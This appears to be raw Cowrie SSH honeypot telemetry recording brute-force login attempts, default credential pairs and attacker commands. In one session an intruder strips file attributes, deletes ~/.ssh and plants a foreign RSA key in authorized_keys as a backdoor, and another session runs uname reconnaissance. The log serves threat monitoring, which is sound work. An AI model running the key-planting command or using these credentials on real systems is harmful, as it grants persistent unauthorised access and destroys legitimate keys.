{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:14:05.209870Z","src_ip":"102.88.137.80","session":"8d7f5d1bf09b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:14:05.263732Z","src_ip":"212.227.235.229","session":"df2544ff9662"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:14:05.574777Z","src_ip":"212.227.235.229","session":"df2544ff9662"}
{"eventid":"cowrie.login.success","username":"root","password":",ki89ol.","message":"login attempt [root/,ki89ol.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:14:05.767096Z","src_ip":"102.88.137.80","session":"8d7f5d1bf09b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:14:06.042893Z","src_ip":"102.88.137.80","session":"8d7f5d1bf09b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:14:06.043597Z","src_ip":"102.88.137.80","session":"8d7f5d1bf09b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:14:06.044526Z","src_ip":"102.88.137.80","session":"8d7f5d1bf09b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:06.176266Z","src_ip":"102.88.137.80","session":"8d7f5d1bf09b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:14:06.937032Z","src_ip":"102.88.137.80","session":"8d7f5d1bf09b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:14:06.937794Z","src_ip":"102.88.137.80","session":"8d7f5d1bf09b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:07.008017Z","src_ip":"212.227.235.229","session":"df2544ff9662"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:14:07.069351Z","src_ip":"102.88.137.80","session":"8d7f5d1bf09b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:07.070206Z","src_ip":"102.88.137.80","session":"8d7f5d1bf09b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49052,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d69567dc2b4","protocol":"ssh","message":"New connection: 212.227.235.229:49052 (1.2.3.4:22) [session: 8d69567dc2b4]","sensor":"my-vps","timestamp":"2025-08-31T01:14:07.074285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:14:07.075083Z","src_ip":"212.227.235.229","session":"8d69567dc2b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:14:07.143358Z","src_ip":"212.227.235.229","session":"8d69567dc2b4"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1523,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f7ddc1cb969","protocol":"ssh","message":"New connection: 102.88.137.80:1523 (1.2.3.4:22) [session: 0f7ddc1cb969]","sensor":"my-vps","timestamp":"2025-08-31T01:14:07.184698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:14:07.185582Z","src_ip":"102.88.137.80","session":"0f7ddc1cb969"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:14:07.308269Z","src_ip":"102.88.137.80","session":"0f7ddc1cb969"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:14:07.456283Z","src_ip":"212.227.235.229","session":"8d69567dc2b4"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:07.523709Z","src_ip":"212.227.235.229","session":"57a69fd99096"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:07.525548Z","src_ip":"212.227.235.229","session":"8d69567dc2b4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:14:07.840851Z","src_ip":"102.88.137.80","session":"0f7ddc1cb969"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:08.966329Z","src_ip":"102.88.137.80","session":"0f7ddc1cb969"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":49765,"dst_ip":"1.2.3.4","dst_port":22,"session":"91c026757e18","protocol":"ssh","message":"New connection: 102.88.137.80:49765 (1.2.3.4:22) [session: 91c026757e18]","sensor":"my-vps","timestamp":"2025-08-31T01:14:09.088210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:14:09.089253Z","src_ip":"102.88.137.80","session":"91c026757e18"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:14:09.212184Z","src_ip":"102.88.137.80","session":"91c026757e18"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:14:09.744881Z","src_ip":"102.88.137.80","session":"91c026757e18"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:09.869503Z","src_ip":"102.88.137.80","session":"91c026757e18"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:09.875951Z","src_ip":"102.88.137.80","session":"8d7f5d1bf09b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47584,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc633f899429","protocol":"ssh","message":"New connection: 212.227.125.160:47584 (1.2.3.4:22) [session: fc633f899429]","sensor":"my-vps","timestamp":"2025-08-31T01:14:12.262605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:14:12.263418Z","src_ip":"212.227.125.160","session":"fc633f899429"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:14:12.336555Z","src_ip":"212.227.125.160","session":"fc633f899429"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:14:12.558569Z","src_ip":"212.227.125.160","session":"fc633f899429"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:14:12.902827Z","src_ip":"212.227.125.160","session":"fc633f899429"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:14:12.903605Z","src_ip":"212.227.125.160","session":"fc633f899429"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:12.977654Z","src_ip":"212.227.125.160","session":"fc633f899429"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:12.978903Z","src_ip":"212.227.125.160","session":"fc633f899429"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43256,"dst_ip":"1.2.3.4","dst_port":22,"session":"b84f3e784e6b","protocol":"ssh","message":"New connection: 212.227.125.160:43256 (1.2.3.4:22) [session: b84f3e784e6b]","sensor":"my-vps","timestamp":"2025-08-31T01:14:22.708138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:14:22.708955Z","src_ip":"212.227.125.160","session":"b84f3e784e6b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:14:22.783289Z","src_ip":"212.227.125.160","session":"b84f3e784e6b"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:14:23.238957Z","src_ip":"212.227.125.160","session":"b84f3e784e6b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:24.315262Z","src_ip":"212.227.125.160","session":"b84f3e784e6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59954,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed72c218e429","protocol":"ssh","message":"New connection: 212.227.125.160:59954 (1.2.3.4:22) [session: ed72c218e429]","sensor":"my-vps","timestamp":"2025-08-31T01:14:33.164918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:14:33.172937Z","src_ip":"212.227.125.160","session":"ed72c218e429"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:14:33.238636Z","src_ip":"212.227.125.160","session":"ed72c218e429"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-31T01:14:33.639084Z","src_ip":"212.227.125.160","session":"ed72c218e429"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:34.730023Z","src_ip":"212.227.125.160","session":"ed72c218e429"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36662,"dst_ip":"1.2.3.4","dst_port":22,"session":"150d2f940113","protocol":"ssh","message":"New connection: 212.227.235.229:36662 (1.2.3.4:22) [session: 150d2f940113]","sensor":"my-vps","timestamp":"2025-08-31T01:14:36.607681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:14:39.918904Z","src_ip":"212.227.235.229","session":"150d2f940113"}
